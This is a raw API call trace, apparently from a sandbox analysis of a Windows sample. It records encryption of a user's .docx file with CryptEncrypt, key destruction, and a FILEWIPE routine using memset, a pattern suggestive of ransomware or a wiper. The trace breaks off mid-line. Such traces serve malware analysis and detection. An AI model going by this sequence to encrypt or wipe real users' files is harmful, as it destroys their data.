HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.938] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.938] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0170.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.939] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0170.939] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.939] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.939] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.941] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1880e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18810) returned 1 [0170.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.941] CharLowerBuffW (in: lpsz="byte[100369]", cchLength=0xc | out: lpsz="byte[100369]") returned 0xc [0170.941] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.943] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.943] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.943] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.943] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9fd9a8*, pdwDataLen=0x87e820*=0x1880e, dwBufLen=0x18810 | out: pbData=0x9fd9a8*, pdwDataLen=0x87e820*=0x18810) returned 1 [0170.944] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.944] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.944] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.944] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.944] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.945] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.945] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.945] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.945] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0170.945] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.945] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0170.945] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.945] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0170.945] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.975] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.983] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.983] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.984] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0170.984] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.984] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.984] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0170.984] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.984] CryptDestroyKey (hKey=0x90af18) returned 1 [0170.985] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.985] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.985] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.985] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.985] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0170.985] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.985] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0170.985] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.985] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0170.986] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.986] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0170.986] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0170.986] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0170.986] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.986] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0170.986] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.986] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0170.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.986] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0170.986] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.986] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.986] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0170.986] FreeLibrary (hLibModule=0x74f20000) returned 1 [0170.986] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.986] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.987] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.991] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.991] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0170.991] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0170.992] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.992] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0x45d595f0, ftLastWriteTime.dwHighDateTime=0x1d5921d, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 0x90af58 [0170.993] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0170.993] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0170.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0170.993] CharLowerBuffW (in: lpsz="byte[100366]", cchLength=0xc | out: lpsz="byte[100366]") returned 0xc [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0170.994] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.994] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0170.994] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0170.994] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0170.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0170.995] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27c8 [0170.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.995] FreeLibrary (hLibModule=0x75c90000) returned 1 [0170.995] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0170.996] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0170.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 